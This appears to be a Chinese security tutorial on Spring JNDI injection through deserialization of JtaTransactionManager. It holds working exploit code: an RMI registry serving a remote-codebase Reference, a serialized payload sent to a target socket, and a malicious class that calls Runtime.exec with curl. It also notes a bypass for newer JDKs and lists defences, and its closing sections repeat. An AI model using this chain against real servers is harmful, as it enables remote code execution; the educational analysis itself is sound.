Java代码审计系列(二)：JNDI注入漏洞分析与复现<\/h1>

1. 漏洞概述<\/h2>
JNDI注入是一种利用Java命名和目录接口(JNDI)功能的安全漏洞，攻击者可以通过控制JNDI查找的参数，使应用程序加载并执行恶意代码。本教学文档将详细分析Spring框架中的JNDI注入漏洞原理，并提供完整的复现过程。<\/p>

2. 核心概念<\/h2>

2.1 JNDI (Java Naming and Directory Interface)<\/h3>

JNDI是Java提供的API，用于查找和访问各种命名和目录服务<\/li>
功能：将名称与对象绑定，提供统一的接口访问不同资源<\/li>

类比：类似于JDBC构建在抽象层上，增加程序灵活性<\/li> <\/ul>

2.2 RMI (Remote Method Invocation)<\/h3>

Java提供的分布式应用API，实现远程方法调用(RPC)<\/li>
允许一个JVM下的对象调用其他JVM下的远程对象<\/li>

核心特性：如果当前JVM没有某个类的定义，会从远程URL下载class文件<\/li> <\/ul>

3. 漏洞原理分析<\/h2>

3.1 漏洞触发链<\/h3>

反序列化入口<\/strong>：JtaTransactionManager<\/code>类的readObject<\/code>方法<\/p>

private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream ois)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    ois.<\/span>defaultReadObject<\/span>();<\/span>
<\/span><\/span>    this<\/span>.<\/span>jndiTemplate<\/span> =<\/span> new<\/span> JndiTemplate();<\/span>
<\/span><\/span>    this<\/span>.<\/span>initUserTransactionAndTransactionManager<\/span>();<\/span>
<\/span><\/span>    this<\/span>.<\/span>initTransactionSynchronizationRegistry<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>

调用链展开<\/strong>：<\/p>

initUserTransactionAndTransactionManager()<\/code><\/li>
lookupUserTransaction(this.userTransactionName)<\/code><\/li>
this.getJndiTemplate().lookup(userTransactionName, UserTransaction.class)<\/code><\/li>
<\/ul>
<\/li>

关键点<\/strong>：userTransactionName<\/code>参数可控<\/p>
public<\/span> void<\/span> setUserTransactionName<\/span>(<\/span>String userTransactionName)<\/span> {<\/span>
<\/span><\/span>    this<\/span>.<\/span>userTransactionName<\/span> =<\/span> userTransactionName;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3.2 漏洞利用机制<\/h3>

攻击者构造恶意序列化对象，设置userTransactionName<\/code>为攻击者控制的RMI地址<\/li>
目标应用反序列化时触发lookup<\/code>方法<\/li>
RMI服务端返回一个Reference<\/code>对象，指向攻击者控制的HTTP服务器上的恶意class文件<\/li>
目标应用从攻击者服务器下载并执行恶意代码<\/li>
<\/ol>
4. 漏洞复现环境<\/h2>
4.1 环境要求<\/h3>

JDK版本：1.7 (原因见5.1节限制说明)<\/li>
使用测试环境：https:\/\/github.com\/zerothoughts\/spring-jndi<\/li>
<\/ul>
4.2 组件说明<\/h3>


ExploitableServer<\/strong>：接收反序列化对象的服务端<\/p>
ServerSocket serverSocket =<\/span> new<\/span> ServerSocket(<\/span>9999<\/span>);<\/span>
<\/span><\/span>ObjectInputStream objectInputStream =<\/span> new<\/span> ObjectInputStream(<\/span>socket.<\/span>getInputStream<\/span>());<\/span>
<\/span><\/span>Object object =<\/span> objectInputStream.<\/span>readObject<\/span>();<\/span>
<\/span><\/span><\/code><\/pre><\/li>

ExploitClient<\/strong>：攻击者客户端<\/p>
\/\/ 创建RMI Registry
<\/span><\/span><\/span><\/span>Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 创建指向恶意class的Reference
<\/span><\/span><\/span><\/span>Reference reference =<\/span> new<\/span> javax.<\/span>naming<\/span>.<\/span>Reference<\/span>(<\/span>"ExportObject"<\/span>,<\/span>"ExportObject"<\/span>,<\/span>"http:\/\/127.0.0.1:9987\/"<\/span>);<\/span>
<\/span><\/span>ReferenceWrapper referenceWrapper =<\/span> new<\/span> com.<\/span>sun<\/span>.<\/span>jndi<\/span>.<\/span>rmi<\/span>.<\/span>registry<\/span>.<\/span>ReferenceWrapper<\/span>(<\/span>reference);<\/span>
<\/span><\/span>registry.<\/span>bind<\/span>(<\/span>"Object"<\/span>,<\/span> referenceWrapper);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 构造恶意对象
<\/span><\/span><\/span><\/span>org.<\/span>springframework<\/span>.<\/span>transaction<\/span>.<\/span>jta<\/span>.<\/span>JtaTransactionManager<\/span> object =<\/span> new<\/span> org.<\/span>springframework<\/span>.<\/span>transaction<\/span>.<\/span>jta<\/span>.<\/span>JtaTransactionManager<\/span>();<\/span>
<\/span><\/span>object.<\/span>setUserTransactionName<\/span>(<\/span>"rmi:\/\/"<\/span>+<\/span>localAddress+<\/span>":1099\/Object"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 发送给目标
<\/span><\/span><\/span><\/span>ObjectOutputStream objectOutputStream =<\/span> new<\/span> ObjectOutputStream(<\/span>socket.<\/span>getOutputStream<\/span>());<\/span>
<\/span><\/span>objectOutputStream.<\/span>writeObject<\/span>(<\/span>object);<\/span>
<\/span><\/span><\/code><\/pre><\/li>

恶意类ExportObject<\/strong>：<\/p>
public<\/span> class<\/span> ExportObject<\/span> {<\/span>
<\/span><\/span>    public<\/span> ExportObject<\/span>()<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"curl http:\/\/localhost:10000\/"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span>(<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>            e.<\/span>printStackTrace<\/span>();<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
5. 关键限制与绕过<\/h2>
5.1 JDK版本限制<\/h3>

JDK 8u191+限制<\/strong>：设置了com.sun.jndi.ldap.object.trustURLCodebase=false<\/code>，禁止从远程URL加载class文件<\/li>
解决方案<\/strong>：使用本地类路径中的类进行利用（如Tomcat中的类）<\/li>
<\/ul>
5.2 绕过方法参考<\/h3>

参考文章：

Exploiting JNDI Injections in Java<\/a><\/li>
中文翻译版：JNDI注入漏洞的利用与防御<\/a><\/li>
<\/ul>
<\/li>
<\/ul>
6. 防御措施<\/h2>

升级JDK到最新版本<\/li>
限制反序列化操作，使用白名单控制可反序列化的类<\/li>
设置JVM系统属性com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li>
对JNDI查找参数进行严格校验和过滤<\/li>
<\/ol>
7. 参考资源<\/h2>

Java安全开发指南<\/a><\/li>
Spring JNDI测试环境<\/a><\/li>
腾讯安全博客<\/a><\/li>
<\/ol>
通过本教学文档，您应该能够全面理解JNDI注入漏洞的原理、利用方式及防御方法，并具备独立复现该漏洞的能力。<\/p>

Java代码审计系列(二)：JNDI注入漏洞分析与复现<\/h1>

2. 核心概念<\/h2>

3. 漏洞原理分析<\/h2>

4. 漏洞复现环境<\/h2>

5. 关键限制与绕过<\/h2>

6. 防御措施<\/h2> 升级JDK到最新版本<\/li> 限制反序列化操作，使用白名单控制可反序列化的类<\/li> 设置JVM系统属性com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li>

7. 参考资源<\/h2> Java安全开发指南<\/a><\/li> Spring JNDI测试环境<\/a><\/li> 腾讯安全博客<\/a><\/li> <\/ol> 通过本教学文档，您应该能够全面理解JNDI注入漏洞的原理、利用方式及防御方法，并具备独立复现该漏洞的能力。<\/p>

7. 参考资源<\/h2>

Java安全开发指南<\/a><\/li>
Spring JNDI测试环境<\/a><\/li>
腾讯安全博客<\/a><\/li> <\/ol>
通过本教学文档，您应该能够全面理解JNDI注入漏洞的原理、利用方式及防御方法，并具备独立复现该漏洞的能力。<\/p>